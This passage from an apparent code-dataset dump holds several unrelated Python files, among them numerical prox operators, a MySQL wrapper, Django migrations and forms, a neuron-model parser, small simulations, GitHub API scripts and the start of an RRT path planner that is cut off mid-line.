torch.norm(V_normalized, p=p)\n lower_bound = 0.0\n U = torch.zeros(vec_size, dtype=torch.float, device=V.device)\n\n\n #estimator for g function\n if g_est is None:\n g_est = estimate_gFunction(p)\n\n for k in range( math.ceil(math.log2(1./eps)) ):\n\n mid_bound = 0.5 * (upper_bound + lower_bound )\n for j in range(vec_size):\n try:\n if V.get_device() >= 0:\n\n #NOTE: Tensors moved back and forth between cpu and gpu to pass through the estimated g function\n g_est_input_on_cpu = ( mid_bound * V_normalized[j] ** ((2.0-p) / (p-1.0)) ).to( torch.device(\"cpu\") ) \n\n g_est_output_on_cpu = g_est( g_est_input_on_cpu )\n\n g_est_output_on_gpu = torch.tensor(g_est_output_on_cpu, dtype = torch.float32, device = V.device)\n\n\n U_j = V_normalized[j] * g_est_output_on_gpu\n\n else:\n\n U_j = V_normalized[j] * g_est(mid_bound * V_normalized[j] ** ((2.0-p) / (p-1.0)) )\n\n except ValueError:\n #if argument of g_est is above the given values (during estimating ga) the output is 1\n U_j = V_normalized[j] \n U[j] = U_j\n\n #compute norm\n U_norm = torch.norm(U, p=p)\n\n #update bounds\n if U_norm < mid_bound:\n upper_bound = mid_bound\n else:\n lower_bound = mid_bound\n\n\n #logging.debug('Computed the proximal operator in {0:0.2f}(s)'.format(time.time() - t_start) )\n U = U.unsqueeze(0)\n return U * signs / rho\n\ndef norm2squaredProxOp(V, rho):\n \"\"\"\n Return the 2-norm prox operator for the vector V\n argmin_X ||X||_2^2 + rho/2 \\|X - V\\|_2^2\n \"\"\"\n return rho / (rho + 2) * V\n\ndef EuclidianProxOp(V, rho):\n \"\"\"\n Return the 2-norm prox operator for the vector V\n argmin_X rho ||X||_2 + 1/2 \\|X - V\\|_2^2\n \"\"\"\n V_norm = torch.norm(V, 2)\n if V_norm < rho:\n return torch.zeros( V.size() ).unsqueeze(0)\n return (1 - rho / V_norm ) * V.unsqueeze(0)\n\ndef ell1normProxOp(V, rho):\n \"\"\"\n Return the 2-norm prox operator for the vector V\n argmin_X ||X||_1 + rho/2 \\|X - V\\|_2^2\n \"\"\"\n V_proj = torch.max(V - 1./rho, V * 0.0) - torch.max(-1. * V - 1./rho, V * 0.0)\n return V_proj.unsqueeze(0)\n\ndef estimate_gFunction(p, eps=1.e-8, kind='linear'):\n \"\"\"\n Return an estimator for the g function that is the solution of (x/a)^(p-1)+x=1.\n \"\"\"\n\n g_inv = lambda x: (1. - x ) ** (1./ (1. 
- p)) * x\n\n #Generate a set of x and a pairs\n x = torch.arange(0, 1, eps)\n\n\n a = g_inv( x )\n\n return interp1d(a, x, kind=kind)\n\n\n\n \n \n \n \ndef _testOpt(U, V, rho, p):\n V = V.squeeze(0)\n U = U.squeeze(0)\n vec_size = V.size()[0]\n norm_U = torch.norm(U, p=p)\n return [(U[i] / norm_U) ** (p-1.0) + rho * (U[i] - V[i]) for i in range(vec_size)]\n \ndef clearFile(file):\n \"Delete all contents of a file\"\n with open(file,'w') as f:\n f.write(\"\")\n\ndef dumpFile(fname, obj):\n \"\"\"\n Dump picklable object obj to the file fname.\"\n \"\"\"\n with open(fname,'wb') as f:\n pickle.dump(obj, f)\n\ndef loadFile(fname):\n \"\"\"\n Load the object dumped in fname.\n \"\"\"\n with open(fname, 'rb') as current_file:\n obj = pickle.load(current_file)\n return obj\n \n \nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--n\", type=int, help=\"vector size\", default=10)\n parser.add_argument(\"--p\", type=float, help=\"p norm\", default=2.)\n parser.add_argument(\"--rho\", type=float, help=\"rho\", default=1.0)\n args = parser.parse_args()\n \n# for p in [1.5, 2.5,4,5]:\n# estimate_g = estimate_gFunction(p)\n# dumpFile('interpolations/p' + str(p), estimate_g)\n# print('Estimation and saving done for {}'.format(p))\n\n if args.p not in [1, 2]:\n g_est = estimate_gFunction( args.p )\n\n t_s = time.time()\n# logging.getLogger().setLevel(logging.INFO) \n V = torch.randn(1, args.n)\n V = torch.abs(V)\n\n \n U_p = pNormProxOp(V, rho=args.rho, p=args.p, g_est = g_est)\n #U = EuclidianProxOp(V, args.rho)\n# print (U_p.size())\n t_e = time.time()\n print(\"Time taken is \", t_e - t_s)\n","sub_path":"code/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55432591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ----\n# Yprisoner \n# 2019/8/17 上午10:15\n# ------\nfrom pymysql import (\n Connect,\n Connection,\n cursors\n)\n\nmysql_config: dict = dict(\n host='192.168.1.17',\n user='root',\n password='root',\n database='mex_ancient',\n port=3306,\n charset='utf8'\n)\n\n\nclass Database(object):\n __mysql_conf = dict()\n __conn = None\n __cursor = None\n\n def __init__(self, conf: dict):\n self.__mysql_conf = dict(dict(cursorclass=cursors.DictCursor), **conf)\n if self.__conn is None:\n self.__conn = self.connection\n self.__cursor = self.__conn.cursor()\n\n @property\n def connection(self) -> Connection:\n return Connect(**self.__mysql_conf)\n\n def get(self, sql: str, data: list = None) -> dict:\n self.__cursor.execute(sql, data)\n return self.__cursor.fetchone()\n\n def fetch(self, sql: str, data: list = None) -> list:\n self.__cursor.execute(sql, data)\n return self.__cursor.fetchall()\n\n def exec(self, sql: str, data: list) -> int:\n if len(data) > 0:\n result = self.__cursor.execute(sql, data)\n else:\n result = self.__cursor.execute(sql)\n self.__conn.commit()\n return result\n\n def __del__(self):\n self.__cursor.close()\n self.__conn.close()\n\n\ndef getQuery() -> Database:\n return Database(mysql_config)\n","sub_path":"lib/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403318827","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass 
Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'ElectricPanel'\n db.create_table(u'public_lights_electricpanel', (\n ('identifier', self.gf('django.db.models.fields.CharField')(unique=True, max_length=10, primary_key=True)),\n ('number', self.gf('django.db.models.fields.CharField')(max_length=20, null=True)),\n ('geom', self.gf('django.contrib.gis.db.models.fields.PointField')(null=True)),\n ))\n db.send_create_signal(u'public_lights', ['ElectricPanel'])\n\n # Adding model 'ElectricPanelEvent'\n db.create_table(u'public_lights_electricpanelevent', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('device', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['public_lights.ElectricPanel'])),\n ('time', self.gf('django.db.models.fields.DateTimeField')()),\n ('status', self.gf('django.db.models.fields.CharField')(max_length=15)),\n ('extra', self.gf('django.db.models.fields.CharField')(max_length=200, null=True)),\n ))\n db.send_create_signal(u'public_lights', ['ElectricPanelEvent'])\n\n # Adding model 'PhaseLine'\n db.create_table(u'public_lights_phaseline', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('panel', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['public_lights.ElectricPanel'])),\n ('phase', self.gf('django.db.models.fields.CharField')(max_length=1)),\n ))\n db.send_create_signal(u'public_lights', ['PhaseLine'])\n\n # Adding unique constraint on 'PhaseLine', fields ['panel', 'phase']\n db.create_unique(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n # Adding index on 'PhaseLine', fields ['panel', 'phase']\n db.create_index(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n\n def backwards(self, orm):\n # Removing index on 'PhaseLine', fields ['panel', 'phase']\n db.delete_index(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n # Removing unique constraint on 'PhaseLine', fields ['panel', 'phase']\n db.delete_unique(u'public_lights_phaseline', ['panel_id', 'phase'])\n\n # Deleting model 'ElectricPanel'\n db.delete_table(u'public_lights_electricpanel')\n\n # Deleting model 'ElectricPanelEvent'\n db.delete_table(u'public_lights_electricpanelevent')\n\n # Deleting model 'PhaseLine'\n db.delete_table(u'public_lights_phaseline')\n\n\n models = {\n u'public_lights.electricpanel': {\n 'Meta': {'object_name': 'ElectricPanel'},\n 'geom': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}),\n 'identifier': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10', 'primary_key': 'True'}),\n 'number': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'})\n },\n u'public_lights.electricpanelevent': {\n 'Meta': {'object_name': 'ElectricPanelEvent'},\n 'device': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['public_lights.ElectricPanel']\"}),\n 'extra': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'status': ('django.db.models.fields.CharField', [], {'max_length': '15'}),\n 'time': ('django.db.models.fields.DateTimeField', [], {})\n },\n u'public_lights.phaseline': {\n 'Meta': {'unique_together': \"(('panel', 'phase'),)\", 'object_name': 'PhaseLine', 'index_together': \"[['panel', 'phase']]\"},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'panel': ('django.db.models.fields.related.ForeignKey', [], {'to': 
u\"orm['public_lights.ElectricPanel']\"}),\n 'phase': ('django.db.models.fields.CharField', [], {'max_length': '1'})\n }\n }\n\n complete_apps = ['public_lights']\n","sub_path":"migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351375092","text":"import sys\nimport logging\nimport inspect\n\nimport numpy as np\nimport sympy as sp\n\nimport ANNarchy_future.api as api\nimport ANNarchy_future.parser as parser\n\n\nclass NeuronParser(object):\n \"\"\"Neuron parser.\n\n Attributes:\n neuron (api.Neuron): Neuron class.\n name (str): name of the Neuron class.\n attributes (list): list of attributes (parameters and variables).\n parameters (list): list of parameters.\n variables (list): list of variables.\n inputs (list): list of input variables (conductances).\n outputs (list): list of output variables (firing rate).\n update_equations (list): update equations.\n spike_condition (Condition): spike condition.\n reset_equations (list): reset equations.\n \"\"\"\n\n def __init__(self, neuron:'api.Neuron'):\n\n \"\"\"Initializes the parser.\n\n Sets:\n\n * `self.neuron`\n * `self.name`\n \"\"\"\n\n self.neuron = neuron\n self._spiking = False\n self.name = self.neuron.__class__.__name__\n\n # Logging\n self._logger = logging.getLogger(__name__)\n self._logger.debug(\"Neuron parser created.\")\n\n # Attributes\n self.attributes = []\n self.parameters = []\n self.variables = []\n self.shared = []\n self.inputs = []\n self.outputs = []\n\n # Equations to retrieve\n self.update_equations = []\n self.update_dependencies = []\n self.spike_condition = []\n self.spike_dependencies = []\n self.reset_equations = []\n self.reset_dependencies = []\n\n def is_spiking(self) -> bool:\n \"Returns True if the Neuron class is spiking.\"\n\n return self._spiking\n\n def extract_variables(self):\n\n \"\"\"Iterates over `neuron.__dict__` and extracts all `Parameter()` and `Variable()` instances.\n\n Sets:\n\n * `self._spiking`\n * `self.attributes`\n * `self.parameters`\n * `self.variables`\n * `self.shared`\n * `self.inputs`\n * `self.outputs`\n\n \"\"\"\n\n # List attributes\n current_attributes = list(self.neuron.__dict__.keys())\n\n for attr in current_attributes:\n var = getattr(self.neuron, attr)\n # Parameter\n if isinstance(var, (api.Parameter, )):\n self.parameters.append(attr)\n self.attributes.append(attr)\n # Variable\n if isinstance(var, (api.Variable, )):\n self.variables.append(attr)\n self.attributes.append(attr)\n if var in self.neuron._inputs:\n self.inputs.append(attr)\n if var in self.neuron._outputs:\n self.outputs.append(attr)\n\n # Shared variables\n for attr in self.attributes:\n if getattr(self.neuron, attr)._shared:\n self.shared.append(attr)\n\n # Get lists of parameters and variables\n self._logger.info(\"Attributes: \" + str(self.attributes))\n self._logger.info(\"Parameters: \" + str(self.parameters))\n self._logger.info(\"Variables: \" + str(self.variables))\n\n # Set the attributes to the neuron\n self.neuron.attributes = self.attributes\n self.neuron._parser = self\n\n def analyse_equations(self):\n\n \"\"\"Analyses the neuron equations.\n\n Calls update(), spike() and reset() to retrieve the `Equations` objects.\n\n Sets:\n\n * `self.update_equations`\n * `self.spike_condition`\n * `self.reset_equations`\n\n \"\"\"\n\n # List of methods\n callables = [f for f in dir(self.neuron) if callable(getattr(self.neuron, f))]\n\n # Analyse 
update()\n if 'update' in callables:\n\n self._logger.info(\"Calling Neuron.update().\")\n\n signature = inspect.signature(self.neuron.update)\n if 'method' in signature.parameters.keys():\n method = signature.parameters['method'].default\n if not method in parser.Config.numerical_methods:\n self._logger.error(self.name+\".update(): \"+ method + \" is not available.\")\n sys.exit(1)\n else:\n method = 'euler'\n try:\n with self.neuron.Equations(method=method) as n:\n self.neuron.update(n)\n except Exception:\n self._logger.exception(\"Unable to analyse \" + self.name + \".update()\")\n sys.exit(1)\n\n self.update_equations, self.update_dependencies = self.process_equations(self.neuron._current_eq)\n self.neuron._current_eq = []\n\n # For spiking neurons only\n if 'spike' in callables:\n\n self._logger.info(\"Neuron has a spike() method.\")\n self._spiking = True\n\n self._logger.info(\"Calling Neuron.spike().\")\n \n # Analyse spike()\n try:\n with self.neuron.Equations() as n:\n self.neuron.spike(n)\n except Exception:\n self._logger.exception(\"Unable to analyse spike().\")\n sys.exit(1)\n\n self.spike_condition, self.spike_dependencies = self.process_condition(self.neuron._current_eq)\n self.neuron._current_eq = []\n \n # Analyse reset()\n self._logger.info(\"Calling Neuron.reset().\")\n try:\n with self.neuron.Equations() as n:\n self.neuron.reset(n)\n except Exception:\n self._logger.exception(\"Unable to analyse reset().\")\n sys.exit(1)\n\n self.reset_equations, self.reset_dependencies = self.process_equations(self.neuron._current_eq)\n self.neuron._current_eq = []\n\n # Collect random variables\n if hasattr(self.neuron, '_random_variables'):\n self.random_variables = self.neuron._random_variables\n else:\n self.random_variables = {}\n\n def process_condition(self, equations) -> 'parser.Condition':\n\n if len(equations) > 1:\n self._logger.error(\"Neuron.spike() must define only one Equations context.\")\n raise SyntaxError()\n\n name, eq = equations[0].equations[0]\n\n condition = parser.Condition(self.neuron, name, eq)\n condition.parse()\n\n return condition, condition._dependencies\n\n def process_equations(self, equations) -> list:\n \n \"\"\"Checks all declared equations and applies a numerical method if necessary.\n \n Args:\n equations: list of Equations objects.\n\n Returns:\n a list of blocks, which are lists of equations of three types: assignments, ODEs and conditions.\n \n \"\"\"\n dependencies = []\n blocks = parser.get_blocks(self, equations)\n\n for block in blocks:\n block.dependencies()\n for dep in block._dependencies:\n dependencies.append(dep)\n block.parse()\n\n dependencies = list(set(dependencies))\n\n return blocks, dependencies\n\n def __str__(self):\n\n code = \"\"\n\n code += \"Parameters: \" + str(self.parameters) + \"\\n\"\n code += \"Variables: \" + str(self.variables) + \"\\n\\n\"\n\n code += \"Neural equations:\\n\"\n for block in self.update_equations:\n code += block.raw()\n\n if self._spiking:\n code += \"\\nSpike emission:\\n\"\n code += self.spike_condition.raw() + \"\\n\"\n\n code += \"\\nReset equations:\\n\"\n for block in self.reset_equations:\n code += block.raw()\n\n return code\n","sub_path":"ANNarchy_future/parser/NeuronParser.py","file_name":"NeuronParser.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112577096","text":"from gpkit import Variable, Monomial\nimport numpy as np\n\nfrom robust.robust_gp_tools import RobustGPTools\n\n\ndef 
test_check_if_no_data():\n for _ in xrange(100):\n number_of_monomials = int(50*np.random.random())+1\n number_of_gp_variables = int(np.random.rand()*20) + 1\n number_of_uncertain_variables = int(np.random.rand()*5) + 1\n vector_to_choose_from = [0, 0, 0, 0, 0, 0, 0, 0, 1, -1]\n\n m = number_of_monomials*[1]\n p_uncertain_vars = []\n data_monomials = []\n\n for j in xrange(number_of_monomials):\n for i in xrange(number_of_gp_variables):\n x = Variable('x_%s' % i)\n m[j] *= x**(np.random.rand()*10 - 5)\n\n for i in xrange(number_of_uncertain_variables):\n u = Variable('u_%s' % i, np.random.random(), pr=100*np.random.random())\n p_uncertain_vars.append(u)\n neg_pos_neutral_powers = [vector_to_choose_from[int(10*np.random.random())] for _ in xrange(number_of_monomials)]\n\n for j in xrange(number_of_monomials):\n m[j] *= u**(np.random.rand()*5*neg_pos_neutral_powers[j])\n if neg_pos_neutral_powers[j] != 0:\n data_monomials.append(j)\n\n for i in xrange(number_of_monomials):\n if i in data_monomials:\n # noinspection PyUnresolvedReferences\n assert (not RobustGPTools.check_if_no_data(p_uncertain_vars, m[i].exps[0]))\n else:\n # noinspection PyUnresolvedReferences\n assert (RobustGPTools.check_if_no_data(p_uncertain_vars, m[i].exps[0]))\n\n\ndef test():\n test_check_if_no_data()\n","sub_path":"robust/testing/t_robust_gp_tools.py","file_name":"t_robust_gp_tools.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212778323","text":"from django.urls import path\n\nfrom .views import(\n article_list,\n article_detail,\n article_create,\n)\n\napp_name = 'articles'\n\nurlpatterns = [\n path('', article_list, name='article-list'),\n path('create/', article_create, name='article-create'),\n path('', article_detail, name='article-detail'),\n]\n","sub_path":"articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"337713244","text":"# This file is part of VertNet: https://github.com/VertNet/webapp\n#\n# VertNet is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# VertNet is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with VertNet. 
If not, see: http://www.gnu.org/licenses\n\n\"\"\"API methods configuration file.\n\"\"\"\nLAST_UPDATED = '2016-05-20T10:11:43+CEST'\n\n# Versions\nUTIL_VERSION = 'util.py 2016-05-13T12:38:30+CEST'\n\n# Download variables\n\n# limit on documents in a search result: rows per file\nSEARCH_CHUNK_SIZE = 1000\n# See api_cnt_performance_analysis.pdf at https://goo.gl/xbLIGz\nOPTIMUM_CHUNK_SIZE = 500\n# limit on the number of files in a single compose request\nCOMPOSE_FILE_LIMIT = 32\n# limit on the number of files in a composition\nCOMPOSE_OBJECT_LIMIT = 1024\n# bucket for temp compositions\nTEMP_BUCKET = 'vn-dltest'\n# production bucket for downloads\nDOWNLOAD_BUCKET = 'vn-downloads2'\nFILE_EXTENSION = 'tsv'\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"58406360","text":"from django import forms\n\n\nclass ContactForm(forms.Form):\n    name = forms.CharField(required=True, label='Nombre', max_length=50, min_length=2, widget=forms.TextInput(\n        attrs={\n            'class': 'form-control',\n            'placeholder': 'Escribe tu nombre'\n        }\n    ))\n    email = forms.EmailField(required=True, label='Email', max_length=100, widget=forms.EmailInput(\n        attrs={\n            'class': 'form-control',\n            'placeholder': 'Escribe tu email'\n        }\n    ))\n    content = forms.CharField(required=True, label='Contenido', max_length=200, widget=forms.Textarea(\n        attrs={\n            'class': 'form-control',\n            'rows': 3,\n            'placeholder': 'Escribe tu mensaje...'\n        }\n    ))\n","sub_path":"webempresa/contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"180863454","text":"from pylab import *\nimport math\n\n# Physical constants\ng = 9.8\nm = 1.0\nrho = 1.0\nCd = 1.0\nA = math.pi * pow(0.01, 2.0)\nalpha = rho * Cd * A / 2.0\nbeta = alpha / m\n\n# Initial conditions\nX0 = 1.0\nY0 = 0.0\nVx0 = 70.0\nVy0 = 80.0\n\n# Time steps\nsteps = 1000\nt_HIT = 2.0*Vy0/g\ndt = t_HIT / steps\n\n# No drag\nX_ND = list()\nY_ND = list()\n\nfor i in arange(steps+1):\n    X_ND.append(X0 + Vx0 * dt * i)\n    Y_ND.append(Y0 + Vy0 * dt * i - 0.5 * g * pow(dt * i, 2.0))\n\n# With drag\nX_WD = list()\nY_WD = list()\nVx_WD = list()\nVy_WD = list()\n\nX_WD.append(X0)\nY_WD.append(Y0)\nVx_WD.append(Vx0)\nVy_WD.append(Vy0)\n\nstop = 0\nfor i in range(1,steps+1):\n    if stop != 1:\n        speed = pow(pow(Vx_WD[i-1],2.0)+pow(Vy_WD[i-1],2.0),0.5)\n\n        # First calculate velocity\n        Vx_WD.append(Vx_WD[i-1] * (1.0 - beta * speed * dt))\n        Vy_WD.append(Vy_WD[i-1] + (- g - beta * Vy_WD[i-1] * speed) * dt)\n\n        # Now calculate position\n        X_WD.append(X_WD[i-1] + Vx_WD[i-1] * dt)\n        Y_WD.append(Y_WD[i-1] + Vy_WD[i-1] * dt)\n\n        # Stop if hits ground\n        if Y_WD[i] <= 0.0:\n            stop = 1\n\n# Plot results\nplot(X_ND, Y_ND)\nplot(X_WD, Y_WD)\nshow()\n","sub_path":"lab5/PMwAR.py","file_name":"PMwAR.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"269733075","text":"#\n# @lc app=leetcode.cn id=856 lang=python3\n#\n# [856] Score of Parentheses\n#\n# https://leetcode-cn.com/problems/score-of-parentheses/description/\n#\n# algorithms\n# Medium (60.97%)\n# Likes: 162\n# Dislikes: 0\n# Total Accepted: 10.8K\n# Total Submissions: 17.7K\n# Testcase Example: '\"()\"'\n#\n# Given a balanced parentheses string S, compute the score of the string based\n# on the following rules:\n# \n# \n# () has score 1.\n# AB has score A + B, where A and B are balanced parentheses strings.\n# (A) has score 2 * A, where A is a balanced parentheses string.\n# \n# \n# \n# \n# Example 1:\n# \n# Input: \"()\"\n# Output: 1\n# \n# \n# Example 2:\n# \n# Input: \"(())\"\n# Output: 2\n# \n# \n# Example 3:\n# \n# Input: \"()()\"\n# Output: 2\n# \n# \n# Example 4:\n# \n# Input: \"(()(()))\"\n# Output: 6\n# \n# \n# \n# \n# Note:\n# \n# \n# S is a balanced parentheses string, containing only ( and ).\n# 2 <= S.length <= 50\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n    def scoreOfParentheses(self, S: str) -> int:\n        stack = [0] #The score of the current frame\n\n        for x in S:\n            if x == '(':\n                stack.append(0)\n            else:\n                v = stack.pop()\n                stack[-1] += max(2 * v, 1)\n\n        return stack.pop()\n# @lc code=end\n\n","sub_path":"856.括号的分数.py","file_name":"856.括号的分数.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"403964726","text":"def Fibonachi1(n):\n    n_prev,n_prev_prev=1,1\n    for i in range(2,n):\n        n_prev_prev,n_prev= n_prev,n_prev + n_prev_prev\n    return n_prev\n\ndef memoize(f):\n    memo = {}\n    def helper(x):\n        if x not in memo: \n            memo[x] = f(x)\n        return memo[x]\n    return helper\n    \n@memoize\ndef fib(n):\n    if n<0:\n        raise ValueError(\"Wrong number\")\n    if n == 0:\n        return 0\n    elif n == 1:\n        return 1\n    else:\n        return fib(n-1) + fib(n-2)\n\nprint (fib(-1)) ","sub_path":"old/other/nThFibon.py","file_name":"nThFibon.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"285544666","text":"import numpy as np\nimport pandas as pd\nimport settings\nimport matplotlib.pyplot as plt\n\n\nfrom collections import defaultdict\nfrom github import Github\n\ndef get_prs(repo, pivotal_members):\n    pr_count = defaultdict(int)\n\n    for prs in repo.get_pulls('all'):\n\n        if is_pivot(prs.user.login, pivotal_members):\n            continue\n\n        created = prs.created_at\n        created = created.replace(hour=0, minute=0, second=0, microsecond=0) # squash it down to the date\n        pr_count[created] += 1\n\n    dates, occurances = list(pr_count.keys()), list(pr_count.values())\n\n    return np.array(dates, dtype=np.datetime64), np.array(occurances), pr_count\n\n\ndef is_pivot(login, pivotal_member):\n    for member in pivotal_member:\n        if login == member.login:\n            return True\n        if login == 'dependabot':\n            return True\n\n    return False\n\n\nif __name__ == \"__main__\":\n\n    print(\"Spinning up the radar...connecting to GitHub\")\n    g = Github(settings.GH_KEY)\n    org = g.get_organization(settings.ORGANIZATION)\n    pivotal_members = []\n\n    for team in org.get_teams(): \n        if team.name == 'Pivotal':\n            pivotal_members = [member for member in team.get_members()]\n\n    repos = [org.get_repo(x) for x in settings.REPOS]\n\n    print(\"Scanning data in {}\".format(settings.ORGANIZATION))\n\n    totals_dict = defaultdict(int)\n    for repo in repos:\n        print(\"Scanning {}\".format(repo.full_name))\n\n        array_dates, array_occurances, pr_counts = get_prs(repo, pivotal_members)\n\n        for key, value in pr_counts.items():\n            totals_dict[key] += value\n\n    df = pd.DataFrame(totals_dict.items())\n    df.columns = ['Date', 'PRs']\n    df = df.set_index(df['Date'])\n    df.index = pd.to_datetime(df.index)\n\n    g = df.groupby(pd.Grouper(freq=\"M\"))\n    g = g.sum()\n\n    plt.figure(figsize=(12, 16), dpi=100)\n    ax = g.plot.line()\n    ax.set_title(\"Concourse # of PRs per Year\")\n    ax.set_ylabel(\"# PRs per month\")\n    ax.set_xlabel(\"Date\")\n    ax.grid()\n\n    
plt.savefig('test.png', dpi=100)\n plt.show()\n\n print(g)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364684079","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM)\n\nBeam1 = 4 \nLED = 17\nt = 0.05\n \nGPIO.setup(Beam1, GPIO.IN)\nGPIO.setup(LED, GPIO.OUT)\n\nfor index in range(1000):\n if(GPIO.input(Beam1) == True):\n print(\"Solid\")\n GPIO.output(LED, False)\n else:\n print(\"Beam Broken\")\n GPIO.output(LED, True)\n time.sleep(t)\n\nprint(\"Done\")\nGPIO.cleanup()\n","sub_path":"IR.py","file_name":"IR.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"456908958","text":"import requests\nfrom datetime import date, timedelta\n\n\ndef get_trending_repositories(top_size):\n repos_url = 'https://api.github.com/search/repositories'\n datetime_week_ago = (date.today() - timedelta(days=7)).strftime('%Y-%m-%d')\n created_last_week = 'created:>={}'.format(datetime_week_ago)\n params = {\n 'q': created_last_week,\n 'sort': 'stars',\n 'per_page': top_size\n }\n trending_repos = requests.get(repos_url, params=params)\n top_github_repos = trending_repos.json()['items']\n return top_github_repos\n\n\ndef get_open_issues_amount(repo_owner, repo_name):\n repo_url = 'https://api.github.com/repos/{}/{}/issues'.format(\n repo_owner,\n repo_name\n )\n issues = requests.get(repo_url)\n return len(issues.json())\n\n\ndef show_top_repo_info(top_number, repo_name, repo_issues, repo_url, repo_stars):\n print('#{}\\nName: {}\\nStars: {}\\nIssues: {}\\nUrl: {}\\n'.format(\n top_number,\n repo_name,\n repo_stars,\n repo_issues,\n repo_url\n ))\n\n\nif __name__ == '__main__':\n print('Top 20 of Github repositories by stars for the last week:\\n')\n top_size = 20\n top_github_repos = get_trending_repositories(top_size)\n for top_number, repo in list(enumerate(top_github_repos, start=1)):\n repo_name = repo['name']\n repo_owner = repo['owner']['login']\n repo_url = repo['url']\n repo_stars = repo['stargazers_count']\n repo_issues = get_open_issues_amount(\n repo_owner,\n repo_name\n )\n show_top_repo_info(\n top_number,\n repo_name,\n repo_issues,\n repo_url,\n repo_stars\n )","sub_path":"github_trending.py","file_name":"github_trending.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"605587920","text":"\"\"\"\nRRT算法与Halton序列结合,把节点扩展的随机过程用Halton序列\n\"\"\"\nimport math\nimport random\nimport time\nfrom NewRRT.LeeDrawer import draw_results\n\nfrom shapely.geometry import LineString, Point\n\nfrom NewRRT import InverseSequence\nfrom NewRRT.LeeHalton import LeeHalton\nfrom sobol_seq import sobol_seq\n\n\nclass LeeRRTPlanner():\n def __init__(self):\n super(LeeRRTPlanner,self).__init__()\n\n def initialise(self,environment,bounds,start_pose,goal_region,object_radius,steer_distance,num_iterations,resolution,runForFullIterations):\n \"\"\"\n 初始化参数\n environment: 障碍物环境\n bounds: 路径边界\n start_pose:起点\n goal_refion: 目标区域\n object_radius: 对象半径\n steer_distance: 步长\n num_iterations: 迭代次数\n resolution:\n :return:\n \"\"\"\n self.env = environment\n self.obstacles = environment.obstacles\n self.bounds = bounds\n self.minx, self.miny, self.minz, self.maxx, self.maxy, self.maxz = bounds\n self.start_pose = start_pose\n self.goal_region = goal_region\n self.obj_radius = 
